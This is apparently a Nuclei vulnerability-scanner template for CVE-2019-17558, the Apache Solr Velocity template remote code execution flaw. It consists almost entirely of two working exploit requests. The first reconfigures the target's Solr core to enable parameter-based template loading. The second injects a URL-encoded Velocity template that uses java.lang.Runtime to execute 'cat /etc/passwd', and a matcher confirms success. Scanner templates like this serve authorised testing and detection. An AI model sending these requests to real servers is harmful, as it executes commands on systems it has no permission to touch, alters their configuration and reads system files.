nuclei-templates/cves/2019/CVE-2019-17558.yaml

id: CVE-2019-17558

info:
  name: Apache Solr 8.3.0 - Remote Code Execution via Velocity Template
  author: pikpikcu
  severity: critical
  refrense: https://nvd.nist.gov/vuln/detail/CVE-2019-17558
  tags: cve,cve2019,apache,rce

# Refrense:https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133
# Issues:-https://issues.apache.org/jira/browse/SOLR-13971

requests:
  - raw:   # Request: set "params.resource.loader.enabled"
      - |
        POST /solr/atom/config HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Connection: close
        Content-Type: application/json
        Content-Length: 259
        Upgrade-Insecure-Requests: 1

        {
            "update-queryresponsewriter": {
              "startup": "lazy",
              "name": "velocity",
              "class": "solr.VelocityResponseWriter",
              "template.base.dir": "",
              "solr.resource.loader.enabled": "true",
              "params.resource.loader.enabled": "true"
            }
        }        

      # RCE via velocity template:
      # Get /etc/passwd

      - |
        GET /solr/atom/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27cat%20/etc/passwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Connection: close
        Upgrade-Insecure-Requests: 1        

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body